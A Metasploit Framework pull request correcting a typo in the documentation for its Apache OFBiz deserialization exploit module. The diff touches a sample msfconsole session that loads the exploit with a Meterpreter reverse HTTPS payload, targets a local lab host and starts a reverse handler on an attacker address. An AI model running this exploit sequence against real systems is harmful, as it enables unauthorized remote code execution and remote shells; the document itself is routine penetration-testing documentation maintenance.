### PR TITLE
Fix "apache_ofbiz_deserialiation" typo in its module doc

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialization.md
+++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialization.md
@@ -32,11 +32,11 @@ This uses a Linux dropper to execute code.
 ### Apache OFBiz from [Docker](#setup).
 
 ```
-msf6 > use exploit/linux/http/apache_ofbiz_deserialiation
+msf6 > use exploit/linux/http/apache_ofbiz_deserialization
 [*] Using configured payload linux/x64/meterpreter_reverse_https
-msf6 exploit(linux/http/apache_ofbiz_deserialiation) > options
+msf6 exploit(linux/http/apache_ofbiz_deserialization) > options
 
-Module options (exploit/linux/http/apache_ofbiz_deserialiation):
+Module options (exploit/linux/http/apache_ofbiz_deserialization):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
@@ -66,13 +66,13 @@ Exploit target:
    1   Linux Dropper
 
 
-msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
+msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
-msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 192.168.1.7
+msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 192.168.1.7
 lhost => 192.168.1.7
-msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set srvport 8888
+msf6 exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8888
 srvport => 8888
-msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
+msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
 
 [*] Started HTTPS reverse handler on https://192.168.1.7:8443
 [*] Executing automatic check (disable AutoCheck to override)


### PR DESCRIPTION
```
wvu@kharak:~/rapid7/metasploit-framework:master$ rg -i deserialiation
documentation/modules/exploit/linux/http/apache_ofbiz_deserialization.md
35:msf6 > use exploit/linux/http/apache_ofbiz_deserialiation
37:msf6 exploit(linux/http/apache_ofbiz_deserialiation) > options
39:Module options (exploit/linux/http/apache_ofbiz_deserialiation):
69:msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
71:msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 192.168.1.7
73:msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set srvport 8888
75:msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
wvu@kharak:~/rapid7/metasploit-framework:master$
```

Missed in #14732. Hats off to @zeroSteiner for noticing and fixing it in the first place.